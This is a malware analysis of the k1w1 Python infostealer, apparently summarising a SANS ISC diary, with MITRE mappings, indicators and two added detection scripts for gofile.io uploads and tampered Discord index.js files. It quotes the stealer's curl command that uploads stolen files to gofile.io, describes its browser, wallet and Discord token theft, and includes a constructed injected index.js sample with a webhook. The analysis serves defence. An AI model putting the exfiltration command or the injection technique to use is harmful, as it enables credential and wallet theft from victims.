“K1w1” InfoStealer Uses gofile.io for Exfiltration

The k1w1 infostealer is Python-based malware that exfiltrates stolen data through the gofile.io file-sharing service and hunts for credentials and wallet material across user directories. It targets the major Chromium-based browsers and cryptocurrency wallet applications, injects into the Discord desktop client to harvest data, and runs anti-VM, IP-address and process checks to evade analysis.

Keypoints

  • The k1w1 infostealer is a Python-based tool with a VirusTotal score of 7/65 and a SHA256 hash a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c.
  • It uses gofile.io for data exfiltration: it first asks the API for an upload server (https://api.gofile.io/getServer) and then uploads each file with a curl command of the form `curl -F "file=@{path}" https://{gofileserver}.gofile.io/uploadFile`.
  • gofile.io answers each upload with JSON containing a download link; the script posts those links to a Discord channel, so the operator never has to contact the victim host directly.
  • The malware searches for sensitive keywords in common directories (Desktop, Downloads, Documents, Recent) across multiple browsers and wallets, indicating targeted data collection.
  • Targets browser data by enumerating paths for Opera, Chrome, Brave, Yandex, Edge, and related profiles to collect Local Storage and LevelDB information.
  • The script also searches for cryptocurrency wallets (Metamask, Exodus, Binance, Coinbase, etc.) and can inject into Discord to modify code for remote webhook exfiltration.
  • Anti-analysis techniques include VM, IP address, and suspicious process checks to evade sandboxes and automated defenses.
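The two-step gofile.io flow above (a GET to api.gofile.io/getServer followed by a POST to <server>.gofile.io/uploadFile) is a clean network detection opportunity. The following is an added example, not code from the ISC diary or from the k1w1 sample: it parses constructed proxy-style log lines (timestamp, client IP, method, URL) and flags gofile.io uploads, raising the severity when the same client fetched an upload server shortly beforehand. The log format and the five-minute pairing window are assumptions; adapt both to your proxy or NetFlow source.

```python
import re
from datetime import datetime, timedelta

# Constructed sample proxy log (illustrative, not real traffic):
# "<ISO timestamp> <client IP> <method> <URL>"
SAMPLE_PROXY_LOG = """\
2024-05-20T10:01:02Z 10.0.0.15 GET https://api.gofile.io/getServer
2024-05-20T10:01:05Z 10.0.0.15 POST https://store4.gofile.io/uploadFile
2024-05-20T10:02:10Z 10.0.0.22 GET https://www.example.com/
2024-05-20T11:30:00Z 10.0.0.30 POST https://store1.gofile.io/uploadFile
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
# Step 1 of the k1w1 flow: ask the API which upload server to use.
GETSERVER_RE = re.compile(r"^https://api\.gofile\.io/getServer\b", re.I)
# Step 2: multipart POST of the stolen file to the chosen per-region server.
UPLOAD_RE = re.compile(r"^https://[a-z0-9-]+\.gofile\.io/uploadFile\b", re.I)
PAIRING_WINDOW = timedelta(minutes=5)  # assumed; tune to your environment


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "client": client,
        "method": method.upper(),
        "url": url,
    }


def detect_gofile_exfil(log_text):
    """Return one finding per gofile.io upload seen in the log.

    Severity is "high" when the same client called getServer within
    PAIRING_WINDOW before the upload (the exact k1w1 sequence), otherwise
    "medium" (an upload without the API call is still worth a look).
    """
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    last_getserver = {}  # client IP -> timestamp of its most recent getServer call
    findings = []
    for e in events:
        if GETSERVER_RE.match(e["url"]):
            last_getserver[e["client"]] = e["ts"]
        elif e["method"] == "POST" and UPLOAD_RE.match(e["url"]):
            prior = last_getserver.get(e["client"])
            paired = prior is not None and e["ts"] - prior <= PAIRING_WINDOW
            findings.append({
                "client": e["client"],
                "ts": e["ts"].isoformat(),
                "server": e["url"].split("/")[2],  # e.g. store4.gofile.io
                "severity": "high" if paired else "medium",
                "technique": "T1567.002",
            })
    return findings


if __name__ == "__main__":
    for finding in detect_gofile_exfil(SAMPLE_PROXY_LOG):
        print(finding)
```

gofile.io is a public service with legitimate users, so treat a lone upload as a lead rather than a verdict; the getServer-then-uploadFile pairing from a single host, especially from a process that is not a browser, is the stronger signal.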

MITRE Techniques

  • [T1567.002] Exfiltration to Cloud Storage – The malware uploads data to a gofile.io server with a curl-based upload: `curl -F "file=@{path}" https://{gofileserver}.gofile.io/uploadFile`.
  • [T1083] File and Directory Discovery – It searches common directories (Desktop, Downloads, Documents, Recent) for files and keywords.
  • [T1119] Automated Collection – Automates data collection from the local system by scanning for keywords and targeted paths in parallel threads.
  • [T1555.003] Credentials from Web Browsers – Targets browser data (Opera, Chrome, Brave, Yandex, Edge) to harvest tokens and credentials from Local Storage/LevelDB.
  • [T1059.007] JavaScript – Discord Injection – Modifies the Discord client's JavaScript (index.js) so that the client itself exfiltrates data to an attacker-controlled webhook (diary excerpt: “injected content writes … index.js”).
  • [T1497] Virtualization/Sandbox Evasion – Employs anti-analysis checks such as VM detection, IP address checks, and suspicious processes detection.
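Because the Discord injection persists as a rewritten index.js rather than as a running process, the host-side check is a file inspection. The following is an added example, not code from the diary or from the k1w1 sample: it locates the discord_desktop_core/index.js files under a Discord installation, compares each against the one-line stock loader, and extracts any Discord webhook URLs found in the file. The stock content and the installation layout (%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core-*\discord_desktop_core\index.js) are assumptions drawn from common Discord desktop builds; verify them against a clean install before relying on the "modified" flag.

```python
import os
import re
from dataclasses import dataclass, field

# Assumed stock content of discord_desktop_core/index.js on a clean install.
STOCK_INDEX_JS = "module.exports = require('./core.asar');"

# Discord webhook URLs (stable, ptb and canary hosts; the legacy discordapp.com form too).
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+"
)


@dataclass
class IndexJsFinding:
    path: str
    modified: bool              # content differs from STOCK_INDEX_JS
    webhooks: list = field(default_factory=list)


def inspect_index_js(content, path="<memory>"):
    """Classify one index.js body: is it the stock loader, and does it embed webhooks?"""
    normalized = " ".join(content.split())  # tolerate whitespace/newline differences
    modified = normalized != STOCK_INDEX_JS
    webhooks = sorted(set(WEBHOOK_RE.findall(content)))
    return IndexJsFinding(path=path, modified=modified, webhooks=webhooks)


def find_discord_index_js(local_appdata):
    """Yield every discord_desktop_core/index.js under the Discord client folders."""
    for client in ("Discord", "DiscordPTB", "DiscordCanary"):
        root = os.path.join(local_appdata, client)
        if not os.path.isdir(root):
            continue
        for dirpath, _dirs, files in os.walk(root):
            if os.path.basename(dirpath) == "discord_desktop_core" and "index.js" in files:
                yield os.path.join(dirpath, "index.js")


def scan_installations(local_appdata):
    """Inspect every Discord index.js found and return the list of findings."""
    findings = []
    for path in find_discord_index_js(local_appdata):
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings.append(inspect_index_js(fh.read(), path))
    return findings


# Constructed sample of what an injected index.js could look like (illustrative only,
# not the k1w1 payload): a webhook constant plus the original loader line kept intact
# so that Discord still starts normally.
INJECTED_SAMPLE = """\
const https = require('https');
const WEBHOOK = "https://discord.com/api/webhooks/123456789012345678/abcDEF_ghi-JKL";
// ... token-harvesting logic would go here ...
module.exports = require('./core.asar');
"""

if __name__ == "__main__":
    local_appdata = os.environ.get("LOCALAPPDATA")
    results = scan_installations(local_appdata) if local_appdata else [
        inspect_index_js(INJECTED_SAMPLE, "constructed-sample")
    ]
    for r in results:
        status = "MODIFIED" if r.modified else "stock"
        print(f"{r.path}: {status}; webhooks={r.webhooks}")
```

A stock file that has been changed at all is the finding; the webhook extraction just gives the responder the exfiltration destination to block and to pivot on. Run it per user profile, since Discord installs under each user's LOCALAPPDATA rather than under Program Files.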

Indicators of Compromise

  • [Hash] SHA256 – a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c
  • [Domain] gofile.io – File-sharing service used for exfiltration; uploads land on per-server subdomains (e.g. store4.gofile.io), which host the stolen data
  • [Domain] api.gofile.io – API endpoint (/getServer) queried to select the upload server
  • [File name] index.js – Modified in Discord installation to facilitate webhook-based data leakage
  • [File name] opera.exe and [File name] chrome.exe – Browser process names referenced by the script as data sources; not indicators on their own
  • [URL] https://www.virustotal.com/gui/file/a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c – VT reference for the sample hash

Read more: https://isc.sans.edu/diary/rss/30972